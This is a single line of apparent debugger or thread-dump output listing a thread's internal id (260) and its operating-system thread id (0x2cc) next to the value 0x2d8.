0x2d8 Thread: id = 260 os_tid = 0x2cc